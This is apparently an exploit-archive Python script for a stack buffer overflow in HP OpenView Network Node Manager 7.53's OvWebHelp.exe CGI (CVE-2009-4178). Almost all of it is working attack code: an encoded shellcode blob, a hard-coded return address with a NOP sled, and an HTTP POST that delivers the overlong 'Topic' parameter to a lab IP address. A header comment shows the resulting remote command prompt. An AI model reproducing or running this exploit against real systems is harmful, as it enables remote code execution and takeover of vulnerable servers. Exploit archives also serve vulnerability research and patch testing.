#!/usr/bin/python

# Exploit title: HP OpenView NNM OvWebHelp.exe CGI Topic overflow
# Date: 2010.03.30
# Author:
# Software link: hp.com<http://hp.com>
# Version: 7.53
# Tested on: Windows 2003 SP2
# CVE: 2009-4178
# Code:
############################################
# Trying 172.16.29.130...
# Connected to 172.16.29.130.
# Escape character is '^]'.
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\Program Files\HP OpenView\www\cgi-bin>
############################################

import struct
import socket
import httplib
import urllib

#[*] x86/alpha_mixed succeeded with size 746 (iteration=1)
sc =(
"\x89\xe3\xd9\xc3\xd9\x73\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x49\x78\x4e\x69\x45\x50\x45\x50\x43\x30\x45\x30\x4e"
"\x69\x48\x65\x44\x71\x4b\x62\x45\x34\x4e\x6b\x51\x42\x44\x70"
"\x4c\x4b\x43\x62\x44\x4c\x4e\x6b\x50\x52\x44\x54\x4e\x6b\x43"
"\x42\x45\x78\x44\x4f\x4e\x57\x50\x4a\x45\x76\x50\x31\x4b\x4f"
"\x46\x51\x49\x50\x4c\x6c\x45\x6c\x43\x51\x43\x4c\x45\x52\x46"
"\x4c\x47\x50\x4f\x31\x48\x4f\x44\x4d\x43\x31\x49\x57\x4b\x52"
"\x48\x70\x51\x42\x43\x67\x4c\x4b\x50\x52\x46\x70\x4e\x6b\x47"
"\x32\x45\x6c\x47\x71\x48\x50\x4c\x4b\x47\x30\x44\x38\x4f\x75"
"\x49\x50\x50\x74\x51\x5a\x43\x31\x4a\x70\x42\x70\x4c\x4b\x43"
"\x78\x46\x78\x4e\x6b\x43\x68\x45\x70\x47\x71\x48\x53\x4a\x43"
"\x45\x6c\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x47\x71\x4a\x76\x44"
"\x71\x4b\x4f\x45\x61\x49\x50\x4c\x6c\x4b\x71\x4a\x6f\x44\x4d"
"\x45\x51\x4a\x67\x47\x48\x4b\x50\x43\x45\x4b\x44\x46\x63\x51"
"\x6d\x49\x68\x45\x6b\x51\x6d\x46\x44\x43\x45\x4d\x32\x46\x38"
"\x4e\x6b\x42\x78\x44\x64\x45\x51\x49\x43\x45\x36\x4c\x4b\x44"
"\x4c\x50\x4b\x4e\x6b\x50\x58\x47\x6c\x45\x51\x49\x43\x4e\x6b"
"\x46\x64\x4e\x6b\x47\x71\x4e\x30\x4f\x79\x50\x44\x46\x44\x51"
"\x34\x43\x6b\x43\x6b\x43\x51\x51\x49\x42\x7a\x46\x31\x49\x6f"
"\x4b\x50\x50\x58\x43\x6f\x50\x5a\x4c\x4b\x44\x52\x48\x6b\x4b"
"\x36\x51\x4d\x51\x78\x45\x63\x46\x52\x43\x30\x43\x30\x43\x58"
"\x42\x57\x42\x53\x46\x52\x51\x4f\x50\x54\x51\x78\x42\x6c\x50"
"\x77\x47\x56\x47\x77\x4b\x4f\x4b\x65\x4c\x78\x4a\x30\x47\x71"
"\x47\x70\x43\x30\x51\x39\x49\x54\x51\x44\x50\x50\x45\x38\x46"
"\x49\x4d\x50\x50\x6b\x43\x30\x49\x6f\x49\x45\x50\x50\x42\x70"
"\x50\x50\x42\x70\x43\x70\x50\x50\x47\x30\x50\x50\x51\x78\x49"
"\x7a\x44\x4f\x49\x4f\x4b\x50\x4b\x4f\x4b\x65\x4e\x69\x4f\x37"
"\x50\x31\x49\x4b\x51\x43\x45\x38\x44\x42\x47\x70\x47\x61\x51"
"\x4c\x4e\x69\x4b\x56\x43\x5a\x46\x70\x42\x76\x51\x47\x50\x68"
"\x4b\x72\x49\x4b\x44\x77\x43\x57\x4b\x4f\x49\x45\x50\x53\x43"
"\x67\x45\x38\x48\x37\x49\x79\x44\x78\x49\x6f\x4b\x4f\x4e\x35"
"\x51\x43\x51\x43\x51\x47\x45\x38\x50\x74\x48\x6c\x47\x4b\x49"
"\x71\x49\x6f\x4a\x75\x42\x77\x4d\x59\x48\x47\x51\x78\x44\x35"
"\x42\x4e\x42\x6d\x50\x61\x49\x6f\x49\x45\x50\x68\x42\x43\x42"
"\x4d\x51\x74\x43\x30\x4d\x59\x49\x73\x50\x57\x46\x37\x43\x67"
"\x50\x31\x48\x76\x42\x4a\x45\x42\x46\x39\x46\x36\x4d\x32\x49"
"\x6d\x42\x46\x48\x47\x43\x74\x46\x44\x47\x4c\x47\x71\x43\x31"
"\x4e\x6d\x43\x74\x51\x34\x46\x70\x4f\x36\x43\x30\x42\x64\x46"
"\x34\x42\x70\x50\x56\x50\x56\x43\x66\x42\x66\x51\x46\x50\x4e"
"\x46\x36\x43\x66\x46\x33\x43\x66\x51\x78\x44\x39\x48\x4c\x47"
"\x4f\x4c\x46\x4b\x4f\x4b\x65\x4e\x69\x4d\x30\x42\x6e\x50\x56"
"\x43\x76\x49\x6f\x46\x50\x43\x58\x44\x48\x4d\x57\x47\x6d\x51"
"\x70\x49\x6f\x4a\x75\x4d\x6b\x4c\x30\x4c\x75\x4f\x52\x43\x66"
"\x42\x48\x4d\x76\x4f\x65\x4d\x6d\x4f\x6d\x49\x6f\x48\x55\x47"
"\x4c\x47\x76\x43\x4c\x45\x5a\x4b\x30\x4b\x4b\x4d\x30\x44\x35"
"\x43\x35\x4f\x4b\x51\x57\x42\x33\x51\x62\x50\x6f\x43\x5a\x45"
"\x50\x42\x73\x49\x6f\x4a\x75\x46\x6a\x41\x41")

data="A"*57
data2 = "B"*5000
ret = "\xDF\xf2\xe5\x77" + "\x90" * 254 + sc # call esp kernel32.dll
payload = data + ret

p = urllib.urlencode({'Topic':payload,'Target':data2})
h = {"Content-Type": "application/x-www-form-urlencoded","Accept": "text/html","User-Agent": "BackTrack", "Accept-Language": "en"}

c = httplib.HTTPConnection('172.16.29.130')
c.request("POST","/OvCgi/OvWebHelp.exe",p,h)
r = c.getresponse()

print r.status, r.reason
c.close()

print "\nDone\n"